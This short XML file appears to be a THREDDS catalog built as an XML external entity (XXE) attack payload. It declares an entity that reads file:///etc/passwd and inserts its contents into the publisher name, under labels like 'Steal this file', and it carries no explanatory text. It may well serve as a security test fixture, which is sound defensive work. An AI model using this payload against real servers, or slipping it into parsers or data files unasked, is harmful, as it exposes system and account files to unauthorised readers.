<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE catalog [
<!ENTITY textfile SYSTEM "file:///etc/passwd" >
]>

<catalog name="Steal this file" xmlns="http://www.unidata.ucar.edu/namespaces/thredds/InvCatalog/v1.0" >
  <dataset name='Steal it' ID='stealth'>
    <publisher>
      <name>
	Contents of /etc/passwd follow:
&textfile;
      </name>
      <contact email='foo@example.com' />
    </publisher>
  </dataset>
</catalog>
